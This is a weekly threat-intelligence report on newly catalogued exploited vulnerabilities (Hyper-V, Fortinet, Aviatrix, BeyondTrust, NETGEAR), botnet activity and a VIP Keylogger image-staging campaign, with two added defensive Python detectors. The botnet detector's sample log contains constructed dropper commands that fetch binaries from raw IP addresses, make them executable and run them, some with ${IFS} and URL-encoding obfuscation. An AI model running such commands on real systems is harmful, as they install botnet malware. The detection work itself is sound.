Executive Summary
This week, seven critical vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the urgency of patching critical flaws across various vendors. Microsoft led with three entries, followed by Qlik, BeyondTrust, Fortinet, and Aviatrix, each with one critical vulnerability. Compounding these threats, active exploitation was observed in NETGEAR routers, reinforcing the need for immediate security measures to safeguard vulnerable systems.
The surge in botnet activity shows no signs of slowing down, with EnemyBot and Sysrv-K targeting the Spring Cloud Gateway, while the IoT Reaper botnet exploits a 12-year-old vulnerability in Cisco routers. Legacy threats like Mirai and Tsunami remain persistent, leveraging a nine-year-old flaw in the Eir D1000 Modem to compromise outdated infrastructure, proving that neglected systems remain an easy target for attackers.
Malware campaigns this week showcased both sophistication and persistence. The attack on the US Treasury, attributed to the Chinese state-sponsored group Silk Typhoon, highlights the increasing frequency of state-backed operations targeting government entities. A critical zero-day in Aviatrix was exploited to deploy XMRig cryptocurrency miners and the Sliver backdoor, demonstrating attackers’ focus on financial gain and long-term control. Meanwhile, the use of image-based code obfuscation to spread VIP Keylogger underscores the innovative tactics employed to evade detection and compromise systems.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
CVE-2025-21333, CVE-2025-21334 and CVE-2025-21335
Microsoft has addressed three Elevation of Privilege vulnerabilities in the Windows Hyper-V NT Kernel Integration VSP that were exploited in attacks to gain SYSTEM-level access on Windows devices. The Virtualization Service Provider (VSP), an essential component within the root partition of Hyper-V, provides synthetic device support to child partitions through the Virtual Machine Bus (VMBus), allowing those partitions to function as independent systems. These vulnerabilities, which had been actively exploited in the wild as zero-days, were patched in Microsoft's latest security update. With a high CVSS score of 7.8, they have been added to the CISA KEV catalog, highlighting their critical nature. However, the specifics of their exploitation and the identities of the threat actors involved remain undisclosed.
An OS Command Injection vulnerability affects the BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) solutions, impacting versions 24.3.1 and earlier. It allows attackers who already hold administrative privileges to upload and execute malicious files, posing a significant security threat. The flaw has been added to the CISA KEV catalog, underscoring the urgency for organizations to implement immediate mitigation measures.
A critical Authentication Bypass Vulnerability in Fortinet FortiOS and FortiProxy, with a CVSS score of 9.8, enables remote attackers to escalate privileges and gain super-admin access to affected systems. Fortinet has confirmed that this vulnerability has been actively exploited as a zero-day, prompting its inclusion in the CISA KEV catalog. Arctic Wolf Labs researchers have provided further insights into a campaign, initially detected in mid-November 2024, that is believed to exploit CVE-2024-55591. While Fortinet’s advisory does not attribute the discovery of CVE-2024-55591 to Arctic Wolf, there is a significant overlap between the indicators of compromise (IoCs) listed in Fortinet's advisory and those reported by Arctic Wolf Labs.
A critical Authentication Bypass Vulnerability, affecting NETGEAR Router models DGN1000 and DGN2200 v1, has been actively exploited since 2017. With a CVSS score of 9.8, this flaw allows attackers to bypass authentication mechanisms and execute commands with root privileges. This exploitation not only jeopardizes the security of the affected routers but also poses a significant threat to the broader network infrastructure, underscoring the urgent need for immediate remediation.
A Command Injection vulnerability in the Aviatrix Network Controller, rated critical with a CVSS score of 10.0, allows remote attackers to execute arbitrary commands. The flaw affects versions 7.x through 7.2.4820, is actively exploited in real-world attacks, and has been added to the CISA KEV catalog.
A critical HTTP Tunneling vulnerability in Qlik Sense Enterprise, rated 9.9 on the CVSS scale, allows attackers to escalate privileges and send unauthorized HTTP requests to the backend server hosting the software. It affects versions prior to August 2023 Patch 2 and arises from an incomplete fix for CVE-2023-41265. Historically exploited by the Cactus ransomware group, this flaw has been added to the CISA KEV catalog, highlighting the urgency of applying the necessary patches.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and what is actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section lists vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP. It presents the top 5 CVEs with payloads suggestive of botnet activity, such as the use of wget with raw IP addresses.
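The "wget with a raw IP address" pattern used above to tag botnet activity, applied to sensor telemetry as an added example. This is not Loginsoft's Cytellite code; the log records, the IP addresses (documentation ranges) and the handling of ${IFS} and URL-encoded payloads are constructed for illustration.

```python
"""Flag sensor payloads that match the botnet dropper pattern described above.

Added example, not Loginsoft/Cytellite code. The heuristic: a shell fragment
that fetches a file from a raw IPv4 address with wget/curl/tftp, typically
followed by chmod and execution. All log records below are constructed.
"""
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote

# Dotted-quad IPv4 with octets 0-255, not glued to surrounding digits or dots.
IPV4 = (r"(?<![\d.])(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}"
        r"(?:25[0-5]|2[0-4]\d|1?\d?\d)(?![\d.])")
# A fetch tool followed, within the same shell command, by a raw IPv4 address.
FETCH_RE = re.compile(rf"\b(wget|curl|tftp)\b[^;&|\n]*?({IPV4})")
# Signs that the fetched file is made executable and run.
EXEC_RE = re.compile(r"\bchmod\b|\bsh\b|\./[\w.-]+")

# Constructed sensor records, one per line: "<source ip>\t<raw payload>".
SAMPLE_LOG = (
    "198.51.100.7\tcd /tmp;wget http://203.0.113.9/bins/arm7;chmod 777 arm7;./arm7\n"
    "198.51.100.23\tcd${IFS}/tmp;curl${IFS}-O${IFS}http://192.0.2.44/x86;sh${IFS}x86\n"
    "203.0.113.200\t%2Fbin%2Fsh%20-c%20%22tftp%20-g%20-r%20mips%20198.51.100.60%22\n"
    "192.0.2.15\tGET /index.html HTTP/1.1\n"
    "192.0.2.16\twget https://example.com/updates/latest.tar.gz\n"
)


def normalize(raw: str) -> str:
    """Undo the cheap obfuscations seen in sensor payloads: URL encoding and
    ${IFS}/$IFS used in place of spaces."""
    text = unquote(raw)
    return text.replace("${IFS}", " ").replace("$IFS", " ")


def classify(payload: str) -> Optional[dict]:
    """Return fetch tool, dropper host and whether the payload also executes
    what it fetched; None when the payload does not look like a dropper."""
    text = normalize(payload)
    fetch = FETCH_RE.search(text)
    if fetch is None:
        return None
    return {
        "tool": fetch.group(1),
        "host": fetch.group(2),
        "executes": EXEC_RE.search(text) is not None,
    }


def scan(log_text: str) -> list:
    """Run classify() over tab-separated sensor records, keeping only hits."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        src, _, payload = line.partition("\t")
        verdict = classify(payload)
        if verdict is not None:
            hits.append({"src": src, **verdict})
    return hits


def dropper_hosts(hits: list) -> Counter:
    """Count distribution hosts across hits: the addresses worth blocking at egress."""
    return Counter(h["host"] for h in hits)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(dropper_hosts(found))
```

The fetch from a hostname (the last sample record) is deliberately not flagged: the report's indicator is a raw IP, which is what distinguishes throwaway botnet distribution hosts from ordinary package updates, and the normalization step matters because ${IFS} and percent-encoding are exactly what defeats a naive string match.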
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
A Command Injection Vulnerability was uncovered during BeyondTrust’s investigation into the compromise of select customer Remote Support (RS) SaaS instances, including one linked to the U.S. Department of Treasury. Alarmingly, this flaw may have been exploited as a zero-day, potentially allowing attackers to breach BeyondTrust systems and access its customers. The Treasury Department attack, disclosed on December 31, has been attributed to the Chinese state-sponsored Silk Typhoon group, highlighting the advanced tactics employed by nation-state actors to infiltrate critical organizations.
The Wiz Incident Response team has identified that attackers are exploiting the Aviatrix vulnerability to deploy XMRig for cryptocurrency mining and the Sliver command-and-control (C2) framework. XMRig lets threat actors generate illicit profits, while the Sliver backdoor gives them persistent access to compromised systems for follow-up exploitation.
Threat actors have been embedding malicious code within images as part of sophisticated malware campaigns, including the deployment of VIP Keylogger. These attackers use a .NET loader to execute payloads hidden in images uploaded to the file-hosting website archive[.]org. The attack sequence begins with phishing emails disguised as invoices or purchase orders, luring victims into opening malicious attachments, such as Microsoft Excel files. These files exploit a known vulnerability in Equation Editor (CVE-2017-11882) to download a VBScript file. The VBScript then decodes and runs a PowerShell script to retrieve an image from archive[.]org, extract Base64-encoded data, and decode it into a .NET executable. This executable functions as a loader to download and run VIP Keylogger, enabling attackers to capture sensitive information, such as keystrokes, clipboard content, screenshots, and user credentials, from compromised systems.
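A defender-side check for the image-based staging described above, added here as an example; it is not part of the HP Wolf Security report or the original page. It scans a file that claims to be an image for long Base64 runs whose decoded bytes start with a Windows PE header (a .NET loader is a PE file) or an ELF header. The PNG-like sample, the fake PE bytes and the function names are constructed assumptions.

```python
"""Look for executables hidden as Base64 text inside image files.

Added example, not HP Wolf Security's analysis code. The image and the
"executable" below are constructed stand-ins: a PNG magic header, filler,
and a Base64 run that decodes to a fake PE header (MZ ... PE\\0\\0).
"""
import base64
import binascii
import re
from typing import Optional

# Long runs of Base64 alphabet characters; image data itself is binary and
# rarely forms such runs, so these are worth decoding and inspecting.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
IMAGE_MAGIC = {
    PNG_MAGIC: "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def image_type(blob: bytes) -> Optional[str]:
    """Identify the file by its magic bytes (what the file claims to be)."""
    for magic, name in IMAGE_MAGIC.items():
        if blob.startswith(magic):
            return name
    return None


def executable_type(data: bytes) -> Optional[str]:
    """Identify decoded data by its header. .NET assemblies are PE files,
    so an 'MZ' header covers the loader described in the report."""
    if data[:2] == b"MZ":
        return "pe"
    if data[:4] == b"\x7fELF":
        return "elf"
    return None


def find_embedded_executables(blob: bytes) -> list:
    """Decode every long Base64 run in blob and report the ones whose
    decoded bytes start with an executable header."""
    findings = []
    for match in B64_RUN.finditer(blob):
        run = match.group(0)
        run = run[: len(run) - len(run) % 4]   # drop a partial trailing quantum
        try:
            decoded = base64.b64decode(run, validate=True)
        except (ValueError, binascii.Error):
            continue
        kind = executable_type(decoded)
        if kind is not None:
            findings.append({"offset": match.start(), "b64_length": len(run),
                             "decoded_length": len(decoded), "type": kind})
    return findings


def build_sample_image() -> bytes:
    """Constructed PNG-like file carrying a Base64-encoded fake PE header."""
    fake_pe = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 60  # not a real binary
    return PNG_MAGIC + b"\x00" * 200 + base64.b64encode(fake_pe) + b"\xff" * 50


if __name__ == "__main__":
    sample = build_sample_image()
    print("claims to be:", image_type(sample))
    for finding in find_embedded_executables(sample):
        print(finding)
```

The check is cheap enough to run on every image fetched by a script interpreter (PowerShell, wscript) at egress or in a sandbox; an image that carries a decodable PE is the staging artifact this campaign depends on, independent of which keylogger it ultimately loads.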
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/01/13/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/01/14/cisa-adds-four-known-exploited-vulnerabilities-catalog
- https://seclists.org/bugtraq/2013/Jun/8
- https://www.beyondtrust.com/trust-center/security-advisories/bt24-11
- https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603
- https://threatresearch.ext.hp.com/wp-content/uploads/2025/01/HP_Wolf_Security_Threat_Insights_Report_January_2025.pdf
- https://www.bloomberg.com/news/articles/2025-01-08/white-house-rushes-to-finish-cyber-order-after-china-hacks